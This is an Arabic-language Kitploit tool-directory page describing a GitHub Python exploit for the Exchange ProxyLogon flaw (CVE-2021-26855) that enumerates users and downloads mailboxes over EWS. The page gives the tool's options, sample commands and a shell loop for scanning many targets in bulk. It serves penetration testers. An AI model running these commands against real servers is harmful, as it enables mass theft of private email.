Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-26855-d — أداة بايثون لاستغلال ثغرة CVE-2021-26855 (ProxyLogon) لتنزيل رسائل بريد Exchange عبر EWS، مع دعم تعداد المستخدمين وفحص الأهداف الجماعي. | Kitploit
أدوات/GitHubGitHub/mr-xn/cve-2021-26855-d
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمان البريد الإلكتروني
GitHubmr-xn/cve-2021-26855-d

CVE-2021-26855-d

أداة بايثون لاستغلال ثغرة CVE-2021-26855 (ProxyLogon) لتنزيل رسائل بريد Exchange عبر EWS، مع دعم تعداد المستخدمين وفحص الأهداف الجماعي.

عرض المستودع
6418منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الاستخدام الأساسي: python owamails.py -u <url> -l <users.txt> -p <path>

الخيارات الاختيارية:

  -h, --help            show this help message and exit
  -u URL, --url URL     Url, provide schema and not final / (eg
                        https://example.org)
  -l LIST, --list LIST  Users mailbox list
  -p PATH, --path PATH  Path to write emails in xml format
  -f FQDN, --fqdn FQDN  FQDN
  -d DOMAIN, --domain DOMAIN
                        Domain to check mailboxes (eg if .local dont work)

فحص علب البريد الإلكتروني وتنزيل البريد الإلكتروني

أساسي:

python owamails.py -u https://127.0.0.1 -l users.txt -p downloads

لا تحصل على النطاق من الرؤوس:

python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -d mydomain.local

لا تحصل على FQDN من الرؤوس:

python owamails.py -u https://127.0.0.1 -l users.txt -p downloads -f EXCH01

تشغيل جماعي؟:

for i in $(cat targets.txt); do echo $i && python3 owamails.py -u https://$i -l users.txt -p emails; done;

المراجع:

  • https://docs.microsoft.com/en-us/exchange/client-developer/exchange-web-services/how-to-work-with-exchange-mailbox-items-by-using-ews-in-exchange
  • https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
  • https://www.praetorian.com/blog/reproducing-proxylogon-exploit/

مشتق من:
https://gitlab.com/gvillegas/ohwaa/

تنزيل الأداة